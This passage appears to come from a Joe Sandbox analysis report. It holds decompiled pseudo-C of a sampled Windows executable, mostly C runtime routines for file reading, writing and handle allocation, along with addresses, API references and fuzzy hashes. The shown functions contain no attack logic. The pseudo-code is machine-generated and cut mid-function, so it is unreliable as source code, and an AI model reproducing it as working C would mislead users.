                                                                    				 *_t36 = 0x4302e8;
                                                                    				_t45 =  *((intOrPtr*)(_t36 + 8));
                                                                    				 *_t36 = 0x430324;
                                                                    				if( *((intOrPtr*)(_t36 + 8)) != 0) {
                                                                    					_push( *((intOrPtr*)(_t36 + 4)));
                                                                    					return E0042275E(_t32, _t38, _t39, _t45);
                                                                    				}
                                                                    				return _t30;
                                                                    			}










                                                                    0x00421b39
                                                                    0x00421b3e
                                                                    0x00421b4b
                                                                    0x00421b4e
                                                                    0x00421b53
                                                                    0x00421b57
                                                                    0x00421b5b
                                                                    0x00421b5e
                                                                    0x00421b68
                                                                    0x00421b6c
                                                                    0x00421b73
                                                                    0x00421b78
                                                                    0x00421b7e
                                                                    0x00421b8b
                                                                    0x00421b8e
                                                                    0x00421b93
                                                                    0x00421b97
                                                                    0x00421b9b
                                                                    0x00421b9b
                                                                    0x00421b9e
                                                                    0x00421ba8
                                                                    0x00421bac
                                                                    0x00421bb3
                                                                    0x00421bb8
                                                                    0x00421bb9
                                                                    0x00422540
                                                                    0x00422544
                                                                    0x0042254a
                                                                    0x0042254c
                                                                    0x00000000
                                                                    0x00422554
                                                                    0x00422555

                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00421B3E
                                                                      • Part of subcall function 0042246E: RaiseException.KERNEL32(?,?,000000FF,00432DF4,00000000,004302E8,?,?,?,00421C58,000000FF,00432DF4,004480D0,?,000000FF,004136B9), ref: 0042249C
                                                                    • __EH_prolog.LIBCMT ref: 00421B7E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog$ExceptionRaise
                                                                    • String ID: invalid string position$string too long
                                                                    • API String ID: 2062786585-4289949731
                                                                    • Opcode ID: 53f02b49fc375bbb6fd58ab0069bd16c8d38f124c368bef8e055f681e02ecebb
                                                                    • Instruction ID: b2d8ccf0adb99a0b6271aa405870c6bceeea0f971fd0891507c1645c33ecb31b
                                                                    • Opcode Fuzzy Hash: 53f02b49fc375bbb6fd58ab0069bd16c8d38f124c368bef8e055f681e02ecebb
                                                                    • Instruction Fuzzy Hash: D5F01DB1A00218ABC704FBE5D95ABDEB778AF18318F90516BE001B1495DBFC5B088B69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00426055(signed int _a4, signed int _a8, long _a12) {
                                                                    				void _v5;
                                                                    				signed int _v12;
                                                                    				long _v16;
                                                                    				signed int _t79;
                                                                    				void* _t82;
                                                                    				signed int _t86;
                                                                    				signed int* _t89;
                                                                    				long _t90;
                                                                    				void* _t92;
                                                                    				intOrPtr _t93;
                                                                    				signed int _t97;
                                                                    				intOrPtr _t98;
                                                                    				char _t100;
                                                                    				signed int _t101;
                                                                    				long _t103;
                                                                    				long _t106;
                                                                    				signed int _t107;
                                                                    				signed int _t113;
                                                                    				signed int _t114;
                                                                    				signed char _t117;
                                                                    				intOrPtr _t118;
                                                                    				long _t120;
                                                                    				void* _t124;
                                                                    				intOrPtr* _t125;
                                                                    				signed int _t127;
                                                                    				signed char* _t128;
                                                                    				void* _t129;
                                                                    				void* _t130;
                                                                    
                                                                    				_v12 = _v12 & 0x00000000;
                                                                    				_t113 = _a8;
                                                                    				_t124 = _t113;
                                                                    				if(_a12 == 0) {
                                                                    					L42:
                                                                    					__eflags = 0;
                                                                    					return 0;
                                                                    				}
                                                                    				_t79 = _a4;
                                                                    				_t125 = 0x44b140 + (_t79 >> 5) * 4;
                                                                    				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
                                                                    				_t82 =  *_t125 + _t127;
                                                                    				_t117 =  *((intOrPtr*)(_t82 + 4));
                                                                    				if((_t117 & 0x00000002) != 0) {
                                                                    					goto L42;
                                                                    				}
                                                                    				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
                                                                    					_a12 = _a12 - 1;
                                                                    					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
                                                                    					_t20 = _t113 + 1; // 0x10d
                                                                    					_t124 = _t20;
                                                                    					_v12 = 1;
                                                                    					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
                                                                    				}
                                                                    				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
                                                                    					_t86 = _v16;
                                                                    					_t118 =  *_t125;
                                                                    					_v12 = _v12 + _t86;
                                                                    					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
                                                                    					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
                                                                    						L41:
                                                                    						return _v12;
                                                                    					}
                                                                    					__eflags = _t86;
                                                                    					if(_t86 == 0) {
                                                                    						L15:
                                                                    						_t89 =  *_t125 + _t127 + 4;
                                                                    						 *_t89 =  *_t89 & 0x000000fb;
                                                                    						__eflags =  *_t89;
                                                                    						L16:
                                                                    						_t90 = _a8;
                                                                    						_t120 = _v12 + _t90;
                                                                    						__eflags = _t90 - _t120;
                                                                    						_a12 = _t90;
                                                                    						_v12 = _t120;
                                                                    						if(_t90 >= _t120) {
                                                                    							L40:
                                                                    							_t114 = _t113 - _a8;
                                                                    							__eflags = _t114;
                                                                    							_v12 = _t114;
                                                                    							goto L41;
                                                                    						} else {
                                                                    							goto L17;
                                                                    						}
                                                                    						while(1) {
                                                                    							L17:
                                                                    							_t92 =  *_a12;
                                                                    							__eflags = _t92 - 0x1a;
                                                                    							if(_t92 == 0x1a) {
                                                                    								break;
                                                                    							}
                                                                    							__eflags = _t92 - 0xd;
                                                                    							if(_t92 == 0xd) {
                                                                    								__eflags = _a12 - _t120 - 1;
                                                                    								if(_a12 >= _t120 - 1) {
                                                                    									_a12 = _a12 + 1;
                                                                    									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
                                                                    									__eflags = _t97;
                                                                    									if(_t97 != 0) {
                                                                    										L26:
                                                                    										__eflags = _v16;
                                                                    										if(_v16 == 0) {
                                                                    											L34:
                                                                    											 *_t113 = 0xd;
                                                                    											L35:
                                                                    											_t113 = _t113 + 1;
                                                                    											__eflags = _t113;
                                                                    											L36:
                                                                    											_t120 = _v12;
                                                                    											__eflags = _a12 - _t120;
                                                                    											if(_a12 < _t120) {
                                                                    												continue;
                                                                    											}
                                                                    											goto L40;
                                                                    										}
                                                                    										_t98 =  *_t125;
                                                                    										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
                                                                    										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
                                                                    											__eflags = _t113 - _a8;
                                                                    											if(__eflags != 0) {
                                                                    												L33:
                                                                    												E004284D0(__eflags, _a4, 0xffffffff, 1);
                                                                    												_t130 = _t130 + 0xc;
                                                                    												__eflags = _v5 - 0xa;
                                                                    												if(_v5 == 0xa) {
                                                                    													goto L36;
                                                                    												}
                                                                    												goto L34;
                                                                    											}
                                                                    											__eflags = _v5 - 0xa;
                                                                    											if(__eflags != 0) {
                                                                    												goto L33;
                                                                    											}
                                                                    											L32:
                                                                    											 *_t113 = 0xa;
                                                                    											goto L35;
                                                                    										}
                                                                    										_t100 = _v5;
                                                                    										__eflags = _t100 - 0xa;
                                                                    										if(_t100 == 0xa) {
                                                                    											goto L32;
                                                                    										}
                                                                    										 *_t113 = 0xd;
                                                                    										 *((char*)( *_t125 + _t127 + 5)) = _t100;
                                                                    										goto L35;
                                                                    									}
                                                                    									_t101 = GetLastError();
                                                                    									__eflags = _t101;
                                                                    									if(_t101 != 0) {
                                                                    										goto L34;
                                                                    									}
                                                                    									goto L26;
                                                                    								}
                                                                    								_t103 = _a12 + 1;
                                                                    								__eflags =  *_t103 - 0xa;
                                                                    								if( *_t103 != 0xa) {
                                                                    									_a12 = _t103;
                                                                    									goto L34;
                                                                    								}
                                                                    								_a12 = _a12 + 2;
                                                                    								goto L32;
                                                                    							}
                                                                    							 *_t113 = _t92;
                                                                    							_t113 = _t113 + 1;
                                                                    							_a12 = _a12 + 1;
                                                                    							goto L36;
                                                                    						}
                                                                    						_t93 =  *_t125;
                                                                    						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
                                                                    						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
                                                                    							_t128 = _t93 + _t127 + 4;
                                                                    							 *_t128 =  *_t128 | 0x00000002;
                                                                    							__eflags =  *_t128;
                                                                    						}
                                                                    						goto L40;
                                                                    					}
                                                                    					__eflags =  *_t113 - 0xa;
                                                                    					if( *_t113 != 0xa) {
                                                                    						goto L15;
                                                                    					}
                                                                    					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
                                                                    					goto L16;
                                                                    				} else {
                                                                    					_t106 = GetLastError();
                                                                    					_t129 = 5;
                                                                    					if(_t106 != _t129) {
                                                                    						__eflags = _t106 - 0x6d;
                                                                    						if(_t106 == 0x6d) {
                                                                    							goto L42;
                                                                    						}
                                                                    						_t107 = E00426868(_t106);
                                                                    						L10:
                                                                    						return _t107 | 0xffffffff;
                                                                    					}
                                                                    					 *((intOrPtr*)(E00426856())) = 9;
                                                                    					_t107 = E0042685F();
                                                                    					 *_t107 = _t129;
                                                                    					goto L10;
                                                                    				}
                                                                    			}































                                                                    0x0042605b
                                                                    0x00426064
                                                                    0x00426069
                                                                    0x0042606b
                                                                    0x00426229
                                                                    0x00426229
                                                                    0x00000000
                                                                    0x00426229
                                                                    0x00426071
                                                                    0x0042607f
                                                                    0x00426088
                                                                    0x0042608b
                                                                    0x0042608d
                                                                    0x00426093
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042609c
                                                                    0x004260aa
                                                                    0x004260ad
                                                                    0x004260b1
                                                                    0x004260b1
                                                                    0x004260b4
                                                                    0x004260bb
                                                                    0x004260bb
                                                                    0x004260d7
                                                                    0x00426112
                                                                    0x00426115
                                                                    0x00426117
                                                                    0x0042611a
                                                                    0x0042611f
                                                                    0x00426224
                                                                    0x00000000
                                                                    0x00426224
                                                                    0x00426125
                                                                    0x00426127
                                                                    0x00426139
                                                                    0x0042613b
                                                                    0x0042613f
                                                                    0x0042613f
                                                                    0x00426142
                                                                    0x00426142
                                                                    0x00426148
                                                                    0x0042614a
                                                                    0x0042614c
                                                                    0x0042614f
                                                                    0x00426152
                                                                    0x0042621e
                                                                    0x0042621e
                                                                    0x0042621e
                                                                    0x00426221
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426158
                                                                    0x00426158
                                                                    0x0042615b
                                                                    0x0042615d
                                                                    0x0042615f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426165
                                                                    0x00426167
                                                                    0x00426175
                                                                    0x00426178
                                                                    0x0042618e
                                                                    0x004261a2
                                                                    0x004261a8
                                                                    0x004261aa
                                                                    0x004261b6
                                                                    0x004261b6
                                                                    0x004261ba
                                                                    0x004261fc
                                                                    0x004261fc
                                                                    0x004261ff
                                                                    0x004261ff
                                                                    0x004261ff
                                                                    0x00426200
                                                                    0x00426200
                                                                    0x00426203
                                                                    0x00426206
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042620c
                                                                    0x004261bc
                                                                    0x004261be
                                                                    0x004261c3
                                                                    0x004261d7
                                                                    0x004261da
                                                                    0x004261e7
                                                                    0x004261ee
                                                                    0x004261f3
                                                                    0x004261f6
                                                                    0x004261fa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004261fa
                                                                    0x004261dc
                                                                    0x004261e0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004261e2
                                                                    0x004261e2
                                                                    0x00000000
                                                                    0x004261e2
                                                                    0x004261c5
                                                                    0x004261c8
                                                                    0x004261ca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004261cc
                                                                    0x004261d1
                                                                    0x00000000
                                                                    0x004261d1
                                                                    0x004261ac
                                                                    0x004261b2
                                                                    0x004261b4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004261b4
                                                                    0x0042617d
                                                                    0x0042617e
                                                                    0x00426181
                                                                    0x00426189
                                                                    0x00000000
                                                                    0x00426189
                                                                    0x00426183
                                                                    0x00000000
                                                                    0x00426183
                                                                    0x00426169
                                                                    0x0042616b
                                                                    0x0042616c
                                                                    0x00000000
                                                                    0x0042616c
                                                                    0x0042620e
                                                                    0x00426210
                                                                    0x00426215
                                                                    0x00426217
                                                                    0x0042621b
                                                                    0x0042621b
                                                                    0x0042621b
                                                                    0x00000000
                                                                    0x00426215
                                                                    0x00426129
                                                                    0x0042612c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426134
                                                                    0x00000000
                                                                    0x004260d9
                                                                    0x004260d9
                                                                    0x004260e1
                                                                    0x004260e4
                                                                    0x004260fa
                                                                    0x004260fd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426104
                                                                    0x0042610a
                                                                    0x00000000
                                                                    0x0042610a
                                                                    0x004260eb
                                                                    0x004260f1
                                                                    0x004260f6
                                                                    0x00000000
                                                                    0x004260f6

                                                                    APIs
                                                                    • ReadFile.KERNEL32(0000010C,0000010C,00000000,0000010C,00000000,?,?,?), ref: 004260CF
                                                                    • GetLastError.KERNEL32 ref: 004260D9
                                                                    • ReadFile.KERNEL32(?,?,00000001,0000010C,00000000), ref: 004261A2
                                                                    • GetLastError.KERNEL32 ref: 004261AC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastRead
                                                                    • String ID:
                                                                    • API String ID: 1948546556-0
                                                                    • Opcode ID: ef4583aba19ade5e5d45f1483a8a9fc4a23778b4dd0ebdcbea22c49f752c4172
                                                                    • Instruction ID: 617016fc832f5af361c6ab2712e38a0be7f137b163cf5149b806dd52470be273
                                                                    • Opcode Fuzzy Hash: ef4583aba19ade5e5d45f1483a8a9fc4a23778b4dd0ebdcbea22c49f752c4172
                                                                    • Instruction Fuzzy Hash: C661F8307043A5DFDB21CF58E884BAA7BB0BF01304F96459BE8658B392C778D951CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004285EF(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                    				intOrPtr _t68;
                                                                    				void** _t73;
                                                                    				long _t76;
                                                                    				signed int _t81;
                                                                    				char* _t86;
                                                                    				long _t93;
                                                                    				intOrPtr* _t100;
                                                                    				void* _t102;
                                                                    				void* _t107;
                                                                    				char _t110;
                                                                    				struct _OVERLAPPED* _t112;
                                                                    				long _t115;
                                                                    				signed int _t118;
                                                                    				struct _OVERLAPPED* _t120;
                                                                    				void* _t121;
                                                                    				void* _t123;
                                                                    
                                                                    				_t121 = _t123 - 0x3a0;
                                                                    				_t68 =  *0x446f24; // 0x82246c35
                                                                    				_t112 = 0;
                                                                    				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
                                                                    				 *(_t121 - 0x78) = 0;
                                                                    				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
                                                                    				if( *(_t121 + 0x3b0) != 0) {
                                                                    					_t100 = 0x44b140 + ( *(_t121 + 0x3a8) >> 5) * 4;
                                                                    					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
                                                                    					if(( *( *_t100 + _t118 + 4) & 0x00000020) != 0) {
                                                                    						E00429D9C(_t102,  *(_t121 + 0x3a8), 0, 0, 2);
                                                                    					}
                                                                    					_t73 =  *_t100 + _t118;
                                                                    					if((_t73[1] & 0x00000080) == 0) {
                                                                    						if(WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112) == 0) {
                                                                    							 *(_t121 - 0x6c) = GetLastError();
                                                                    						} else {
                                                                    							 *(_t121 - 0x6c) = _t112;
                                                                    							 *(_t121 - 0x78) =  *(_t121 - 0x80);
                                                                    						}
                                                                    					} else {
                                                                    						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
                                                                    						 *(_t121 - 0x6c) = _t112;
                                                                    						if( *(_t121 + 0x3b0) <= _t112) {
                                                                    							L25:
                                                                    							if(( *( *_t100 + _t118 + 4) & 0x00000040) == 0 ||  *( *(_t121 + 0x3ac)) != 0x1a) {
                                                                    								 *((intOrPtr*)(E00426856())) = 0x1c;
                                                                    								_t81 = E0042685F();
                                                                    								 *_t81 = _t112;
                                                                    								L29:
                                                                    								_t77 = _t81 | 0xffffffff;
                                                                    								goto L31;
                                                                    							} else {
                                                                    								_t77 = 0;
                                                                    								L31:
                                                                    								goto L32;
                                                                    							}
                                                                    						} else {
                                                                    							goto L6;
                                                                    						}
                                                                    						do {
                                                                    							L6:
                                                                    							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
                                                                    							_t86 = _t121 - 0x68;
                                                                    							 *(_t121 - 0x70) = _t112;
                                                                    							while(_t107 <  *(_t121 + 0x3b0)) {
                                                                    								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
                                                                    								_t110 =  *( *(_t121 - 0x74));
                                                                    								_t107 = _t107 + 1;
                                                                    								if(_t110 == 0xa) {
                                                                    									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
                                                                    									 *_t86 = 0xd;
                                                                    									_t86 = _t86 + 1;
                                                                    									 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
                                                                    								}
                                                                    								 *_t86 = _t110;
                                                                    								_t86 = _t86 + 1;
                                                                    								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
                                                                    								if( *(_t121 - 0x70) < 0x400) {
                                                                    									continue;
                                                                    								} else {
                                                                    									break;
                                                                    								}
                                                                    							}
                                                                    							_t115 = _t86 - _t121 - 0x68;
                                                                    							if(WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0) == 0) {
                                                                    								 *(_t121 - 0x6c) = GetLastError();
                                                                    								L16:
                                                                    								_t112 = 0;
                                                                    								L17:
                                                                    								_t76 =  *(_t121 - 0x78);
                                                                    								if(_t76 != _t112) {
                                                                    									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
                                                                    									goto L31;
                                                                    								}
                                                                    								if( *(_t121 - 0x6c) == _t112) {
                                                                    									goto L25;
                                                                    								}
                                                                    								_t120 = 5;
                                                                    								if( *(_t121 - 0x6c) != _t120) {
                                                                    									_t81 = E00426868( *(_t121 - 0x6c));
                                                                    								} else {
                                                                    									 *((intOrPtr*)(E00426856())) = 9;
                                                                    									_t81 = E0042685F();
                                                                    									 *_t81 = _t120;
                                                                    								}
                                                                    								goto L29;
                                                                    							}
                                                                    							_t93 =  *(_t121 - 0x80);
                                                                    							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
                                                                    							if(_t93 < _t115) {
                                                                    								goto L16;
                                                                    							}
                                                                    							_t112 = 0;
                                                                    						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
                                                                    					}
                                                                    					goto L17;
                                                                    				} else {
                                                                    					_t77 = 0;
                                                                    					L32:
                                                                    					return E00428381(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
                                                                    				}
                                                                    			}



















                                                                    0x004285f0
                                                                    0x004285fd
                                                                    0x00428603
                                                                    0x0042860b
                                                                    0x00428611
                                                                    0x00428614
                                                                    0x00428617
                                                                    0x00428637
                                                                    0x00428640
                                                                    0x00428648
                                                                    0x00428654
                                                                    0x00428659
                                                                    0x0042865e
                                                                    0x00428664
                                                                    0x00428752
                                                                    0x00428765
                                                                    0x00428754
                                                                    0x00428757
                                                                    0x0042875a
                                                                    0x0042875a
                                                                    0x0042866a
                                                                    0x00428676
                                                                    0x00428679
                                                                    0x0042867c
                                                                    0x00428775
                                                                    0x0042877c
                                                                    0x00428792
                                                                    0x00428798
                                                                    0x0042879d
                                                                    0x0042879f
                                                                    0x0042879f
                                                                    0x00000000
                                                                    0x00428789
                                                                    0x00428789
                                                                    0x004287a7
                                                                    0x00000000
                                                                    0x004287a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428682
                                                                    0x00428682
                                                                    0x00428685
                                                                    0x0042868b
                                                                    0x0042868e
                                                                    0x00428691
                                                                    0x0042869c
                                                                    0x0042869f
                                                                    0x004286a1
                                                                    0x004286a5
                                                                    0x004286a7
                                                                    0x004286aa
                                                                    0x004286ad
                                                                    0x004286ae
                                                                    0x004286ae
                                                                    0x004286b1
                                                                    0x004286b3
                                                                    0x004286b4
                                                                    0x004286be
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004286be
                                                                    0x004286c5
                                                                    0x004286df
                                                                    0x00428706
                                                                    0x00428709
                                                                    0x00428709
                                                                    0x0042870b
                                                                    0x0042870b
                                                                    0x00428710
                                                                    0x004287a4
                                                                    0x00000000
                                                                    0x004287a4
                                                                    0x00428719
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042871d
                                                                    0x00428721
                                                                    0x0042876d
                                                                    0x00428723
                                                                    0x00428728
                                                                    0x0042872e
                                                                    0x00428733
                                                                    0x00428733
                                                                    0x00000000
                                                                    0x00428721
                                                                    0x004286e1
                                                                    0x004286e4
                                                                    0x004286e9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004286f4
                                                                    0x004286f6
                                                                    0x004286fe
                                                                    0x00000000
                                                                    0x00428619
                                                                    0x00428619
                                                                    0x004287a9
                                                                    0x004287bc
                                                                    0x004287bc

                                                                    APIs
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 004286D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: c651b748de8c02b432e9e48a99f3892e0b7ed912375aff4773dff9f2ec1294d3
                                                                    • Instruction ID: 6add02fa8679b5ffe0ebb94416e3f167464424fb96d28161fdbe8f36a556be5b
                                                                    • Opcode Fuzzy Hash: c651b748de8c02b432e9e48a99f3892e0b7ed912375aff4773dff9f2ec1294d3
                                                                    • Instruction Fuzzy Hash: 13516E31A01268CFDB22DFA9EC84ADDBBB9FF85344F61011EE8599B252DB345A01CF15
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 73%
                                                                    			E00428BF3(signed int* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				signed int _t48;
                                                                    				signed int _t49;
                                                                    				signed int _t53;
                                                                    				signed int _t54;
                                                                    				signed int _t61;
                                                                    				signed int* _t73;
                                                                    				signed int _t75;
                                                                    				signed int _t87;
                                                                    				signed int _t88;
                                                                    				signed int* _t90;
                                                                    				void* _t92;
                                                                    				void* _t93;
                                                                    
                                                                    				_t93 = __eflags;
                                                                    				_t68 = __ebx;
                                                                    				_push(0x14);
                                                                    				_push(0x431238);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				 *(_t92 - 0x1c) =  *(_t92 - 0x1c) | 0xffffffff;
                                                                    				_push(0xb);
                                                                    				_t48 = E0042415B(__ebx, __edi, __esi, _t93);
                                                                    				if(_t48 == 0) {
                                                                    					L10:
                                                                    					_t49 = _t48 | 0xffffffff;
                                                                    					L26:
                                                                    					return E00424267(_t49);
                                                                    				}
                                                                    				E004241FB(__ebx, __edi, 0xb);
                                                                    				_t87 = 0;
                                                                    				 *(_t92 - 4) = 0;
                                                                    				while(1) {
                                                                    					 *(_t92 - 0x24) = _t87;
                                                                    					if(_t87 >= 0x40) {
                                                                    						break;
                                                                    					}
                                                                    					_t90 =  *(0x44b140 + _t87 * 4);
                                                                    					if(_t90 == 0) {
                                                                    						_t53 = E00422EEB(0x480);
                                                                    						 *(_t92 - 0x20) = _t53;
                                                                    						__eflags = _t53;
                                                                    						if(_t53 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						_t73 = 0x44b140 + _t87 * 4;
                                                                    						 *_t73 = _t53;
                                                                    						 *0x44b120 =  *0x44b120 + 0x20;
                                                                    						__eflags =  *0x44b120;
                                                                    						while(1) {
                                                                    							__eflags = _t53 -  *_t73 + 0x480;
                                                                    							if(__eflags >= 0) {
                                                                    								break;
                                                                    							}
                                                                    							 *((char*)(_t53 + 4)) = 0;
                                                                    							 *_t53 =  *_t53 | 0xffffffff;
                                                                    							 *((char*)(_t53 + 5)) = 0xa;
                                                                    							 *(_t53 + 8) =  *(_t53 + 8) & 0x00000000;
                                                                    							_t53 = _t53 + 0x24;
                                                                    							 *(_t92 - 0x20) = _t53;
                                                                    						}
                                                                    						_t88 = _t87 << 5;
                                                                    						 *(_t92 - 0x1c) = _t88;
                                                                    						_push(_t88);
                                                                    						_t54 = E00428B31(_t68, _t88, 0x480, __eflags);
                                                                    						__eflags = _t54;
                                                                    						if(_t54 == 0) {
                                                                    							_t42 = _t92 - 0x1c;
                                                                    							 *_t42 =  *(_t92 - 0x1c) | 0xffffffff;
                                                                    							__eflags =  *_t42;
                                                                    						}
                                                                    						break;
                                                                    					} else {
                                                                    						goto L4;
                                                                    					}
                                                                    					while(1) {
                                                                    						L4:
                                                                    						 *(_t92 - 0x20) = _t90;
                                                                    						if(_t90 >=  &(( *(0x44b140 + _t87 * 4))[0x120])) {
                                                                    							break;
                                                                    						}
                                                                    						if((_t90[1] & 0x00000001) != 0) {
                                                                    							L15:
                                                                    							_t90 =  &(_t90[9]);
                                                                    							continue;
                                                                    						}
                                                                    						if(_t90[2] != 0) {
                                                                    							L13:
                                                                    							_t21 =  &(_t90[3]); // 0x8c
                                                                    							_t68 = _t21;
                                                                    							 *0x43008c(_t68);
                                                                    							__eflags = _t90[1] & 0x00000001;
                                                                    							if((_t90[1] & 0x00000001) == 0) {
                                                                    								 *_t90 =  *_t90 | 0xffffffff;
                                                                    								asm("cdq");
                                                                    								_t75 = 0x24;
                                                                    								_t61 = (_t90 -  *(0x44b140 + _t87 * 4)) / _t75 + (_t87 << 5);
                                                                    								__eflags = _t61;
                                                                    								 *(_t92 - 0x1c) = _t61;
                                                                    								break;
                                                                    							}
                                                                    							 *0x430088(_t68);
                                                                    							goto L15;
                                                                    						}
                                                                    						E004241FB(0, _t87, 0xa);
                                                                    						 *(_t92 - 4) = 1;
                                                                    						_t101 = _t90[2];
                                                                    						if(_t90[2] != 0) {
                                                                    							L12:
